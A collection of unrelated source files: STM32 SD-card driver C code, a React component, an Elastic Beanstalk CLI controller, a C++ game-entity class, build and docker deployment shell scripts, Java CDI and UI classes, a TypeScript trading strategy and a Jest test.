  * @param  Instance SD Instance
  * @retval None
  * @note   Weak no-op; override in the application to react to aborts.
  */
__weak void BSP_SD_AbortCallback(uint32_t Instance)
{
  /* Prevent unused argument(s) compilation warning */
  UNUSED(Instance);
}
/**
  * @brief  BSP Tx Transfer completed callbacks
  * @param  Instance SD Instance
  * @retval None
  * @note   Weak no-op; override in the application to be notified when
  *         an IT/DMA write completes.
  */
__weak void BSP_SD_WriteCpltCallback(uint32_t Instance)
{
  /* Prevent unused argument(s) compilation warning */
  UNUSED(Instance);
}
/**
  * @brief  BSP Rx Transfer completed callbacks
  * @param  Instance SD Instance
  * @retval None
  * @note   Weak no-op; override in the application to be notified when
  *         an IT/DMA read completes.
  */
__weak void BSP_SD_ReadCpltCallback(uint32_t Instance)
{
  /* Prevent unused argument(s) compilation warning */
  UNUSED(Instance);
}
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Private_Functions Private Functions
* @{
*/
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/**
  * @brief  SD Abort callback registered with the HAL.
  *         Maps the HAL handle to the BSP instance index and forwards.
  * @param  hsd SD handle
  * @retval None
  */
static void SD_AbortCallback(SD_HandleTypeDef *hsd)
{
  /* Instance 0 owns hsd_sdmmc[0]; any other handle is instance 1. */
  uint32_t instance = (hsd == &hsd_sdmmc[0]) ? 0UL : 1UL;

  BSP_SD_AbortCallback(instance);
}
/**
  * @brief  Tx Transfer completed callback registered with the HAL.
  *         Maps the HAL handle to the BSP instance index and forwards.
  * @param  hsd SD handle
  * @retval None
  */
static void SD_TxCpltCallback(SD_HandleTypeDef *hsd)
{
  /* Instance 0 owns hsd_sdmmc[0]; any other handle is instance 1. */
  uint32_t instance = (hsd == &hsd_sdmmc[0]) ? 0UL : 1UL;

  BSP_SD_WriteCpltCallback(instance);
}
/**
  * @brief  Rx Transfer completed callback registered with the HAL.
  *         Maps the HAL handle to the BSP instance index and forwards.
  * @param  hsd SD handle
  * @retval None
  */
static void SD_RxCpltCallback(SD_HandleTypeDef *hsd)
{
  /* Instance 0 owns hsd_sdmmc[0]; any other handle is instance 1. */
  uint32_t instance = (hsd == &hsd_sdmmc[0]) ? 0UL : 1UL;

  BSP_SD_ReadCpltCallback(instance);
}
#endif
/**
  * @brief  SD EXTI line detection callbacks.
  * @retval None
  * @note   NOTE(review): always reports instance 0 as SD_PRESENT —
  *         presumably the detect EXTI line only serves SD instance 0 and
  *         the BSP callback re-reads the pin state; confirm.
  */
static void SD_EXTI_Callback(void)
{
  uint32_t sd_status = SD_PRESENT;

  BSP_SD_DetectCallback(0,sd_status);
}
/**
  * @brief  Initializes the SD MSP: clocks, GPIO alternate functions,
  *         card-detect pin and the SDMMC1 NVIC interrupt.
  * @param  hsd SD handle (only hsd_sdmmc[0] / SDMMC1 is configured here)
  * @retval None
  */
static void SD_MspInit(SD_HandleTypeDef *hsd)
{
  GPIO_InitTypeDef gpio_init_structure;

  if(hsd == &hsd_sdmmc[0])
  {
#if (USE_SD_BUS_WIDE_4B > 0)
    /* SD pins are in conflict with Camera pins on the Disco board
       therefore Camera must be power down before using the BSP SD
       To power down the camera , Set GPIOJ pin 14 to high
    */
    /* Enable GPIO J clock */
    __HAL_RCC_GPIOJ_CLK_ENABLE();
    gpio_init_structure.Pin       = GPIO_PIN_14;
    gpio_init_structure.Mode      = GPIO_MODE_OUTPUT_PP;
    gpio_init_structure.Pull      = GPIO_NOPULL;
    gpio_init_structure.Speed     = GPIO_SPEED_FREQ_VERY_HIGH;
    HAL_GPIO_Init(GPIOJ, &gpio_init_structure);

    /* Set the camera POWER_DOWN pin (active high) */
    HAL_GPIO_WritePin(GPIOJ, GPIO_PIN_14, GPIO_PIN_SET);
#endif
    /* Enable SDIO clock */
    __HAL_RCC_SDMMC1_CLK_ENABLE();

    /* Enable GPIOs clock */
    __HAL_RCC_GPIOB_CLK_ENABLE();
    __HAL_RCC_GPIOC_CLK_ENABLE();
    __HAL_RCC_GPIOD_CLK_ENABLE();

    /* Common GPIO configuration: SDMMC alternate function, pulled up. */
    gpio_init_structure.Mode      = GPIO_MODE_AF_PP;
    gpio_init_structure.Pull      = GPIO_PULLUP;
    gpio_init_structure.Speed     = GPIO_SPEED_FREQ_VERY_HIGH;
    gpio_init_structure.Alternate = GPIO_AF12_SDIO1;

#if (USE_SD_BUS_WIDE_4B > 0)
    /* SDMMC GPIO CLKIN PB8, D0 PC8, D1 PC9, D2 PC10, D3 PC11, CK PC12, CMD PD2 */
    /* GPIOC configuration */
    gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_9 | GPIO_PIN_10 | GPIO_PIN_11 | GPIO_PIN_12;
#else
    /* SDMMC GPIO CLKIN PB8, D0 PC8, CK PC12, CMD PD2 */
    /* GPIOC configuration */
    gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_12;
#endif
    HAL_GPIO_Init(GPIOC, &gpio_init_structure);

    /* GPIOD configuration (CMD pin) */
    gpio_init_structure.Pin = GPIO_PIN_2;
    HAL_GPIO_Init(GPIOD, &gpio_init_structure);

    /* Configure Input mode for SD detection pin */
    SD_DETECT_GPIO_CLK_ENABLE();
    gpio_init_structure.Pin  = SD_DETECT_PIN;
    gpio_init_structure.Pull = GPIO_PULLUP;
    gpio_init_structure.Speed= GPIO_SPEED_FREQ_HIGH;
    gpio_init_structure.Mode = GPIO_MODE_INPUT;
    HAL_GPIO_Init(SD_DETECT_GPIO_PORT, &gpio_init_structure);

    /* NVIC configuration for SDIO interrupts */
    HAL_NVIC_SetPriority(SDMMC1_IRQn, BSP_SD_IT_PRIORITY, 0);
    HAL_NVIC_EnableIRQ(SDMMC1_IRQn);
  }
}
/**
  * @brief  DeInitializes the SD MSP: disables the SDMMC1 interrupt and
  *         clock and releases the SDMMC GPIO pins.
  * @param  hsd SD handle (only hsd_sdmmc[0] / SDMMC1 is handled here)
  * @retval None
  */
static void SD_MspDeInit(SD_HandleTypeDef *hsd)
{
  GPIO_InitTypeDef gpio_init_structure;

  if(hsd == &hsd_sdmmc[0])
  {
    HAL_NVIC_DisableIRQ(SDMMC1_IRQn);

    /* DeInit GPIO pins can be done in the application
       (by surcharging this __weak function) */

    /* Disable SDMMC1 clock */
    __HAL_RCC_SDMMC1_CLK_DISABLE();

#if (USE_SD_BUS_WIDE_4B > 0)
    /* GPIOJ configuration (camera power-down pin used by MspInit) */
    gpio_init_structure.Pin = GPIO_PIN_14;
    HAL_GPIO_DeInit(GPIOJ, gpio_init_structure.Pin);

    /* GPIOC configuration */
    gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_9 | GPIO_PIN_10 | GPIO_PIN_11 | GPIO_PIN_12;
#else
    gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_12;
#endif
    HAL_GPIO_DeInit(GPIOC, gpio_init_structure.Pin);

    /* GPIOD configuration (CMD pin) */
    gpio_init_structure.Pin = GPIO_PIN_2;
    HAL_GPIO_DeInit(GPIOD, gpio_init_structure.Pin);
  }
}
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE*** */
|
import React, { Component } from "react";
import SearchBar from "../components/SearchBar";
import {
getUser,
getPosts,
setGeoLocation,
fetchLocation,
} from "../Actions/actions";
import { connect } from "react-redux";
class Home extends Component {
componentDidMount() {
this.props.getUser();
this.props.getPosts();
// this.props.fetchLocation(51.5074, -0.1278);
navigator.geolocation.getCurrentPosition((position) => {
this.props.setGeoLocation({
lat: position.coords.latitude,
lng: position.coords.longitude,
});
});
}
shouldComponentUpdate(nextProps, nextState) {
console.log(nextProps);
if (
this.props.geoLocation.lat !== nextProps.geoLocation.lat ||
this.props.geoLocation.location !== nextProps.geoLocation.location ||
this.props.userData.username !== nextProps.userData.username
) {
const { lat, lng, location } = nextProps.geoLocation;
this.props.fetchLocation(lat, lng, location);
return true;
} else return false;
}
render() {
const { userData } = this.props;
const { location } = this.props.geoLocation;
return (
<div className="wrapper">
<div>
<h1>LIVE LIKE A LOCAL</h1>
</div>
<div>
<p>current location is {location}</p>
</div>
<h4>What would you like to do today {userData.username}?</h4>
<div>
<SearchBar />
</div>
</div>
);
}
}
// Map the ENTIRE Redux store into props.
// NOTE(review): mapping the whole state re-renders on any store change;
// consider selecting only userData and geoLocation.
const mSTP = (state) => state;

// Bind the action creators used by Home and connect it to the store.
export default connect(mSTP, {
  getUser,
  getPosts,
  setGeoLocation,
  fetchLocation,
})(Home);
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.core.abstractcontroller import AbstractBaseController
from ebcli.core import fileoperations
from ebcli.lib import elasticbeanstalk as elasticbeanstalk
from ebcli.operations import appversionops
from ebcli.resources.strings import strings, flag_text, alerts
from ebcli.objects.exceptions import InvalidOptionsError
class AppVersionController(AbstractBaseController):
    """Implements ``eb appversion``: create or delete application versions
    for an Elastic Beanstalk application, or — with no action flags —
    interactively list and manage existing versions.
    """

    class Meta(AbstractBaseController.Meta):
        # cement controller metadata: command label, help text and flags.
        label = 'appversion'
        description = strings['appversion.info']
        arguments = [
            (
                ['--delete', '-d'],
                dict(
                    action='store',
                    help=flag_text['appversion.delete'],
                    metavar='VERSION_LABEL')
            ),
            (['--create', '-c'], dict(action='store_true', help=flag_text['appversion.create'])),
            (['--application', '-a'], dict(help=flag_text['appversion.application'])),
            (['--label', '-l'], dict(help=flag_text['deploy.label'])),
            (['--message', '-m'], dict(help=flag_text['deploy.message'])),
            (['--staged'], dict(
                action='store_true', help=flag_text['appversion.staged'])),
            (['--timeout'], dict(default=5, type=int, help=flag_text['general.timeout'])),
            (['--source'], dict(help=flag_text['appversion.source'])),
            (['--process', '-p'], dict(
                action='store_true', help=flag_text['deploy.process']))
        ]
        usage = 'eb appversion <lifecycle> [options ...]'

    def do_command(self):
        """Dispatch on the parsed flags: ``--create`` builds a new version
        without deploying, ``--delete`` removes the named version, and with
        neither flag the interactive version list is shown.  ``--create``
        and ``--delete`` are mutually exclusive.
        """
        # Explicit --application overrides the app from the local EB config.
        if self.app.pargs.application is not None:
            self.app_name = self.app.pargs.application
        else:
            self.app_name = self.get_app_name()
        # noerror: an environment is optional for these operations.
        self.env_name = self.get_env_name(noerror=True)

        if self.app.pargs.create and self.app.pargs.delete is not None:
            raise InvalidOptionsError(alerts['create.can_not_use_options_together'].format("--create", "--delete"))

        if self.app.pargs.create:
            self.message = self.app.pargs.message
            self.staged = self.app.pargs.staged
            self.source = self.app.pargs.source
            self.label = self.app.pargs.label
            self.timeout = self.app.pargs.timeout
            # env.yaml in the project directory forces version processing.
            self.process = self.app.pargs.process or fileoperations.env_yaml_exists()
            appversionops.create_app_version_without_deployment(self.app_name, self.label, self.staged, self.process,
                                                                self.message, self.source, self.timeout)
            return

        if self.app.pargs.delete is not None:
            version_label_to_delete = self.app.pargs.delete
            appversionops.delete_app_version_label(self.app_name, version_label_to_delete)
            return

        self.interactive_list_version()

    def interactive_list_version(self):
        """Interactive mode which allows user to see previous
        versions and allow a choice to:
        - deploy a different version.
        - delete a certain version

        Run when neither --create nor --delete was supplied.
        """
        app_versions = elasticbeanstalk.get_application_versions(self.app_name)['ApplicationVersions']
        appversionops.display_versions(self.app_name, self.env_name, app_versions)
|
// src/dbtypes/dbtype_Thing.cpp
/*
* dbtype_Thing.cpp
*/
#include <string>
#include <iostream>
#include "dbtypes/dbtype_Thing.h"
#include "dbtypes/dbtype_Entity.h"
#include "dbtypes/dbtype_Id.h"
#include "dbtypes/dbtype_ContainerPropertyEntity.h"
#include "concurrency/concurrency_ReaderLockToken.h"
#include "concurrency/concurrency_WriterLockToken.h"
#include "concurrency/concurrency_LockableObject.h"
#include "logging/log_Logger.h"
namespace mutgos
{
namespace dbtype
{
    // -----------------------------------------------------------------------
    // Default constructor; produces an empty Thing (used by factory and
    // deserialization paths).
    Thing::Thing()
      : ContainerPropertyEntity()
    {
    }
    // -----------------------------------------------------------------------
    // Constructs a Thing with the given ID at version 0, instance 0.
    Thing::Thing(const Id &id)
      : ContainerPropertyEntity(id, ENTITYTYPE_thing, 0, 0)
    {
    }
    // -----------------------------------------------------------------------
    // Virtual destructor; nothing Thing-specific to release.
    Thing::~Thing()
    {
    }
    // ----------------------------------------------------------------------
    Entity *Thing::clone(
        const Id &id,
        const VersionType version,
        const InstanceType instance,
        concurrency::ReaderLockToken &token)
    {
        // Deep-copies this Thing under a reader lock.  Returns 0 (null)
        // when the supplied token does not hold this Entity's lock.
        if (token.has_lock(*this))
        {
            Entity *copy_ptr = new Thing(
                id,
                ENTITYTYPE_thing,
                version,
                instance);

            copy_fields(copy_ptr);

            return copy_ptr;
        }
        else
        {
            LOG(error, "dbtype", "clone",
                "Using the wrong lock token!");

            return 0;
        }
    }
    // ----------------------------------------------------------------------
    std::string Thing::to_string(void)
    {
        // Self-locking: holds a reader lock for the duration of the dump.
        concurrency::ReaderLockToken token(*this);

        std::ostringstream strstream;

        // Base-class dump first, then Thing-specific fields.
        strstream << ContainerPropertyEntity::to_string()
                  << "Thing home: " << thing_home.to_string()
                  << std::endl
                  << "Thing lock: " << thing_lock.to_string()
                  << std::endl;

        return strstream.str();
    }
    // ----------------------------------------------------------------------
    bool Thing::set_thing_home(
        const Id &home,
        concurrency::WriterLockToken &token)
    {
        // Sets this Thing's 'home' Entity.  Returns false (and changes
        // nothing) when the token does not hold this Entity's write lock.
        bool success = false;

        if (token.has_lock(*this))
        {
            // Keep the Entity ID-field bookkeeping in sync before the
            // actual assignment.
            set_single_id_field(
                ENTITYFIELD_thing_home,
                thing_home,
                home);
            thing_home = home;
            notify_field_changed(ENTITYFIELD_thing_home);

            success = true;
        }
        else
        {
            LOG(error, "dbtype", "set_thing_home",
                "Using the wrong lock token!");
        }

        return success;
    }
// ----------------------------------------------------------------------
bool Thing::set_thing_home(const Id &home)
{
concurrency::WriterLockToken token(*this);
return set_thing_home(home, token);
}
    // ----------------------------------------------------------------------
    Id Thing::get_thing_home(concurrency::ReaderLockToken &token)
    {
        // Returns the 'home' Entity ID, or a default (invalid) Id when the
        // token does not hold this Entity's lock.
        Id result;

        if (token.has_lock(*this))
        {
            result = thing_home;
        }
        else
        {
            LOG(error, "dbtype", "get_thing_home",
                "Using the wrong lock token!");
        }

        return result;
    }
// ----------------------------------------------------------------------
Id Thing::get_thing_home(void)
{
concurrency::ReaderLockToken token(*this);
return get_thing_home(token);
}
    // ----------------------------------------------------------------------
    bool Thing::set_thing_lock(
        const Lock &lock,
        concurrency::WriterLockToken &token)
    {
        // Replaces this Thing's lock.  Returns false (unchanged) when the
        // token does not hold this Entity's write lock.
        bool result = false;

        if (token.has_lock(*this))
        {
            thing_lock = lock;
            notify_field_changed(ENTITYFIELD_thing_lock);

            result = true;
        }
        else
        {
            LOG(error, "dbtype", "set_thing_lock",
                "Using the wrong lock token!");
        }

        return result;
    }
// ----------------------------------------------------------------------
bool Thing::set_thing_lock(const Lock &lock)
{
concurrency::WriterLockToken token(*this);
return set_thing_lock(lock, token);
}
    // ----------------------------------------------------------------------
    Lock Thing::get_thing_lock(concurrency::ReaderLockToken &token)
    {
        // Returns a copy of this Thing's lock, or a default-constructed
        // Lock when the token does not hold this Entity's lock.
        Lock result;

        if (token.has_lock(*this))
        {
            result = thing_lock;
        }
        else
        {
            LOG(error, "dbtype", "get_thing_lock",
                "Using the wrong lock token!");
        }

        return result;
    }
// ----------------------------------------------------------------------
Lock Thing::get_thing_lock(void)
{
concurrency::ReaderLockToken token(*this);
return get_thing_lock(token);
}
    // ----------------------------------------------------------------------
    Lock::LockType Thing::get_thing_lock_type(
        concurrency::ReaderLockToken &token)
    {
        // Returns the lock's type, or LOCK_INVALID when the token does not
        // hold this Entity's lock.
        Lock::LockType result = Lock::LOCK_INVALID;

        if (token.has_lock(*this))
        {
            result = thing_lock.get_lock_type();
        }
        else
        {
            LOG(error, "dbtype", "get_thing_lock_type",
                "Using the wrong lock token!");
        }

        return result;
    }
    // ----------------------------------------------------------------------
    Id Thing::get_thing_lock_id(concurrency::ReaderLockToken &token)
    {
        // Returns the ID the lock refers to, or a default Id when the
        // token does not hold this Entity's lock.
        Id result;

        if (token.has_lock(*this))
        {
            result = thing_lock.get_id();
        }
        else
        {
            LOG(error, "dbtype", "get_thing_lock_id",
                "Using the wrong lock token!");
        }

        return result;
    }
    // ----------------------------------------------------------------------
    PropertyDirectory::PathString Thing::get_thing_lock_path(
        concurrency::ReaderLockToken &token)
    {
        // Returns the property path the lock refers to, or an empty path
        // when the token does not hold this Entity's lock.
        PropertyDirectory::PathString result;

        if (token.has_lock(*this))
        {
            result = thing_lock.get_path();
        }
        else
        {
            LOG(error, "dbtype", "get_thing_lock_path",
                "Using the wrong lock token!");
        }

        return result;
    }
// ----------------------------------------------------------------------
bool Thing::evalute_lock(
concurrency::ReaderLockToken &token,
Entity *entity_ptr,
concurrency::WriterLockToken &entity_token)
{
bool result = false;
if (token.has_lock(*this))
{
if (not entity_ptr)
{
LOG(error, "dbtype", "evaluate_lock(property/ID)",
"entity_ptr is null!");
}
result = thing_lock.evaluate(entity_ptr, entity_token);
}
else
{
LOG(error, "dbtype", "evaluate_lock(property/ID)",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
bool Thing::evaluate_lock(
concurrency::ReaderLockToken &token,
Entity *entity_ptr,
Group *group_ptr,
concurrency::ReaderLockToken &group_token)
{
bool result = false;
if (token.has_lock(*this))
{
if (not entity_ptr)
{
LOG(error, "dbtype", "evaluate_lock(group)",
"entity_ptr is null!");
}
if (not group_ptr)
{
LOG(error, "dbtype", "evaluate_lock(group)",
"group_ptr is null!");
}
result = thing_lock.evaluate(entity_ptr, group_ptr, group_token);
}
else
{
LOG(error, "dbtype", "evaluate_lock(group)",
"Using the wrong lock token!");
}
return result;
}
    // ----------------------------------------------------------------------
    // Protected constructor used by subclasses and clone()/restore paths;
    // forwards everything to the base class.
    Thing::Thing(
        const Id &id,
        const EntityType &type,
        const VersionType version,
        const InstanceType instance,
        const bool restoring)
      : ContainerPropertyEntity(id, type, version, instance, restoring)
    {
    }
    // ----------------------------------------------------------------------
    size_t Thing::mem_used_fields(void)
    {
        // Approximate memory usage: base-class fields plus this class's
        // home ID and lock.
        size_t total_memory = ContainerPropertyEntity::mem_used_fields();

        total_memory += thing_home.mem_used()
            + thing_lock.mem_used();

        return total_memory;
    }
    // ----------------------------------------------------------------------
    void Thing::copy_fields(Entity *entity_ptr)
    {
        // Copies Thing-specific fields (home, lock) onto entity_ptr after
        // the base class has copied its own.  Locking is the caller's
        // responsibility (see clone()).
        ContainerPropertyEntity::copy_fields(entity_ptr);

        Thing *cast_ptr = 0;

        // Only copy if this is also a Thing.
        if (entity_ptr and
            ((cast_ptr = (dynamic_cast<Thing *>(entity_ptr))) != 0))
        {
            // Keep the target's ID-field bookkeeping in sync, mirroring
            // set_thing_home().
            cast_ptr->set_single_id_field(
                ENTITYFIELD_thing_home,
                cast_ptr->thing_home,
                thing_home);
            cast_ptr->thing_home = thing_home;
            cast_ptr->notify_field_changed(ENTITYFIELD_thing_home);

            cast_ptr->thing_lock = thing_lock;
            cast_ptr->notify_field_changed(ENTITYFIELD_thing_lock);
        }
    }
} /* namespace dbtype */
} /* namespace mutgos */ |
#!/bin/sh
# Unpack the bundled third-party jars into bin/ so their classes are
# available on a plain directory classpath, then remove the jars and
# their metadata.
set -e

JARS="asm-all-4.0.jar kxml2-2.3.0.jar log4j-1.2.16.jar objenesis-1.2.jar xstream-1.4.2.jar"

# Copy every jar into bin/ (fail fast if one is missing).
for jar in $JARS; do
    cp "lib/$jar" bin/
done

cd bin

# Extract without overwriting existing files (-n), then drop the jar.
for jar in $JARS; do
    unzip -n "$jar"
    rm "$jar"
done

# The merged manifests/signatures are meaningless after extraction.
rm -rf META-INF/
|
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression

# Location of the training set on disk.
train_data_path = 'train_data.csv'

# Read the full training table into a DataFrame.
train_data = pd.read_csv(train_data_path)

# Split into the four numeric feature columns and the target column.
feature_columns = ['x1', 'x2', 'x3', 'x4']
X = train_data[feature_columns]
y = train_data['y']

# Fit a logistic-regression classifier on the whole training set.
model = LogisticRegression().fit(X, y)
/**
* This program and the accompanying materials
* are made available under the terms of the License
* which accompanies this distribution in the file LICENSE.txt
*/
package com.archimatetool.editor.ui.factory;
import org.eclipse.emf.ecore.EAttribute;
import org.eclipse.emf.ecore.EObject;
import org.eclipse.gef.EditPart;
import org.eclipse.jface.resource.ImageDescriptor;
import org.eclipse.swt.graphics.Image;
/**
 * Abstract Object UI Provider
 *
 * Base class for {@link IObjectUIProvider} implementations.  Holds the
 * optional EObject instance being provided for and supplies neutral
 * defaults (null images/edit parts, empty default name, all features
 * exposed) for subclasses to override.
 *
 * @author <NAME>
 */
public abstract class AbstractObjectUIProvider implements IObjectUIProvider {
    
    /**
     * The instance of object for this provider.
     * If this is null then we are concerned with the class.
     */
    protected EObject instance;
    
    protected AbstractObjectUIProvider() {
    }
    
    // Don't call this unless you are a Unit Test or a Factory
    // The instance needs to be of the same EClass as this is a provider for
    void setInstance(EObject instance) {
        this.instance = instance;
    }

    /** @return the default name for new objects; empty unless overridden. */
    @Override
    public String getDefaultName() {
        return ""; //$NON-NLS-1$
    }
    
    /** @return a GEF EditPart for the object; null unless overridden. */
    @Override
    public EditPart createEditPart() {
        return null;
    }
    
    /** @return the icon image for the object; null unless overridden. */
    @Override
    public Image getImage() {
        return null;
    }
    
    /** @return the icon image descriptor; null unless overridden. */
    @Override
    public ImageDescriptor getImageDescriptor() {
        return null;
    }
    
    /** @deprecated delegates to the name-based variant. */
    @Override
    @Deprecated
    public boolean shouldExposeFeature(EAttribute feature) {
        return shouldExposeFeature(feature.getName());
    }

    /** @return true (expose every feature) unless overridden. */
    @Override
    public boolean shouldExposeFeature(String featureName) {
        return true;
    }
}
|
#!/bin/bash
set -e
# Login with `oc login ...` before running.
oc project officehours-qa
# Pipe the token via stdin so the password never appears in `ps` output
# or shell history (avoids docker's CLI-password warning as well).
oc whoami -t | docker login -u "$(oc whoami)" --password-stdin docker-registry.webplatformsunpublished.umich.edu
docker build -t docker-registry.webplatformsunpublished.umich.edu/officehours-qa/officehours .
docker push docker-registry.webplatformsunpublished.umich.edu/officehours-qa/officehours
/**
*
* @creatTime 下午3:37:33
* @author Eddy
*/
package org.eddy.tiger.annotated.impl;
import java.lang.annotation.Annotation;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Type;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.enterprise.inject.spi.AnnotatedConstructor;
import javax.enterprise.inject.spi.AnnotatedField;
import javax.enterprise.inject.spi.AnnotatedMethod;
import javax.enterprise.inject.spi.AnnotatedType;
import javax.inject.Inject;
import javax.inject.Named;
import org.eddy.tiger.util.Reflects;
/**
 * Reflective implementation of the CDI {@link AnnotatedType} SPI for a
 * bean class {@code X}.  On construction it scans the class and caches
 * the fields, constructors and methods that are annotated for injection
 * ({@code @Inject} / {@code @Named}).
 *
 * @author Eddy
 */
public class AnnotatedTypeImpl<X> implements AnnotatedType<X> {
	// The underlying bean class this annotated type describes.
	private Class<X> beanClass;
	// Fields marked @Named or @Inject.
	private Set<AnnotatedField<? super X>> annotatedFields = new HashSet<>();
	// Constructors marked @Inject.
	private Set<AnnotatedConstructor<X>> annotatedConstructors = new HashSet<>();
	// Methods marked @Inject.
	private Set<AnnotatedMethod<? super X>> annotatedMethods = new HashSet<>();

	/**
	 * No-arg constructor.
	 * NOTE(review): leaves beanClass null; presumably only used by
	 * framework/serialization code — confirm before calling accessors.
	 */
	public AnnotatedTypeImpl() {
		// TODO Auto-generated constructor stub
	}

	/**
	 * Returns true when the annotation array contains {@code @Inject}
	 * (i.e. the member is an injection point).
	 *
	 * @param annos annotations declared on the member
	 * @return true if {@code @Inject} is present
	 */
	private boolean inject(Annotation[] annos) {
		for (Annotation ann : annos) {
			if (ann.annotationType().equals(Inject.class)) {
				return true;
			}
		}
		return false;
	}

	/**
	 * Returns true when the annotation array contains {@code @Named}.
	 *
	 * @param annos annotations declared on the member
	 * @return true if {@code @Named} is present
	 */
	private boolean named(Annotation[] annos) {
		for (Annotation ann : annos) {
			if (ann.annotationType().equals(Named.class)) {
				return true;
			}
		}
		return false;
	}

	/**
	 * Returns true when any of the annotation arrays contains
	 * {@code @Named} (e.g. parameter annotations).
	 *
	 * @param annos per-parameter annotation arrays
	 * @return true if {@code @Named} is present anywhere
	 */
	@SuppressWarnings("unused")
	@Deprecated
	private boolean named(Annotation[][] annos) {
		for (Annotation[] ann : annos) {
			if (named(ann)) return true;
		}
		return false;
	}

	/**
	 * Builds the annotated type for the given bean class, scanning its
	 * fields, constructors and methods for injection points.
	 *
	 * @param glass the bean class to describe
	 */
	public AnnotatedTypeImpl(Class<X> glass) {
		this.beanClass = glass;
		initFields();
		initConstructor();
		initMethods();
	}

	/**
	 * Caches all methods annotated with {@code @Inject}.
	 */
	private void initMethods() {
		Set<Method> set = Reflects.getMethods(this.beanClass);
		for (Method method : set) {
			if(!inject(method.getAnnotations())) continue;
			annotatedMethods.add(new AnnotatedMethodImpl<X>(method));
		}
	}

	/**
	 * Caches all constructors annotated with {@code @Inject}.
	 */
	private void initConstructor() {
		Set<Constructor<?>> set = Reflects.getConstructors(this.beanClass);
		for (Constructor<?> constructor : set) {
			if(!inject(constructor.getAnnotations())) continue;
			annotatedConstructors.add(new AnnotatedConstructorImpl<X>(constructor));
		}
	}

	/**
	 * Caches all fields annotated with {@code @Named} (with their name)
	 * or {@code @Inject}.
	 */
	private void initFields() {
		Set<Field> set = Reflects.getFields(this.beanClass);
		for (Field field : set) {
			if (named(field.getAnnotations())) {
				annotatedFields.add(new AnnotatedFieldImpl<X>(field, getName(field.getAnnotations())));
			} else if (inject(field.getAnnotations())) {
				annotatedFields.add(new AnnotatedFieldImpl<X>(field));
			}
		}
	}

	/**
	 * Extracts the injection-point name from a {@code @Named} annotation.
	 *
	 * @param annotations annotations declared on the member
	 * @return the {@code @Named} value, or "" when absent
	 */
	private String getName(Annotation[] annotations) {
		for (Annotation ann : annotations) {
			if (ann.annotationType().equals(Named.class)) {
				return ((Named) ann).value();
			}
		}
		return "";
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.Annotated#getBaseType()
	 */
	@Override
	public Type getBaseType() {
		return this.beanClass;
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.Annotated#getTypeClosure()
	 * Intentionally unsupported in this implementation.
	 */
	@Override
	public Set<Type> getTypeClosure() {
		throw new UnsupportedOperationException("Not supported yet.");
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.Annotated#getAnnotation(java.lang.Class)
	 */
	@Override
	public <T extends Annotation> T getAnnotation(Class<T> annotationType) {
		return this.beanClass.getAnnotation(annotationType);
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.Annotated#getAnnotations()
	 */
	@Override
	public Set<Annotation> getAnnotations() {
		return new HashSet<>(Arrays.asList(this.beanClass.getAnnotations()));
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.Annotated#isAnnotationPresent(java.lang.Class)
	 */
	@Override
	public boolean isAnnotationPresent(Class<? extends Annotation> annotationType) {
		return this.beanClass.isAnnotationPresent(annotationType);
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.AnnotatedType#getJavaClass()
	 */
	@Override
	public Class<X> getJavaClass() {
		return this.beanClass;
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.AnnotatedType#getConstructors()
	 */
	@Override
	public Set<AnnotatedConstructor<X>> getConstructors() {
		return this.annotatedConstructors;
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.AnnotatedType#getMethods()
	 */
	@Override
	public Set<AnnotatedMethod<? super X>> getMethods() {
		return this.annotatedMethods;
	}

	/* (non-Javadoc)
	 * @see javax.enterprise.inject.spi.AnnotatedType#getFields()
	 */
	@Override
	public Set<AnnotatedField<? super X>> getFields() {
		return this.annotatedFields;
	}
}
|
// Copyright (c) 2022 <NAME>. All Rights Reserved.
// https://github.com/cinar/indicatorts
import { Asset } from '../asset';
import { Action } from '../action';
import { parabolicSar } from '../../indicator/trend/parabolicSar';
import { Trend } from '../../indicator/trend';
/**
* Parabolic SAR strategy function.
*
* @param asset asset object.
* @return strategy actions.
*/
export function parabolicSarStrategy(asset: Asset): Action[] {
const psar = parabolicSar(asset.highs, asset.lows, asset.closings);
return psar.trends.map((trend) => {
switch (trend) {
case Trend.FALLING:
return Action.SELL;
case Trend.RISING:
return Action.BUY;
case Trend.STABLE:
return Action.HOLD;
}
});
}
|
// Unit test for the Manager class (run with Jest).
const Manager = require('../lib/manager');

describe('Manager', () => {
  describe('Create', () => {
    it('Should create a add Manager role and github username', () => {
      // The module exports an object containing the class, hence
      // `Manager.Manager`; placeholder strings come from repo
      // anonymization.  Constructor args: (name, id, email, number, role).
      const result = new Manager.Manager("<NAME>", "01", "<EMAIL>", "42069", "Manager");
      // toEqual performs a deep structural comparison of instance fields.
      expect(result).toEqual({
        employeeName: "<NAME>",
        id: "01",
        email: "<EMAIL>",
        number: "42069",
        role: "Manager"
      });
    });
  });
});
// index.js
/*!
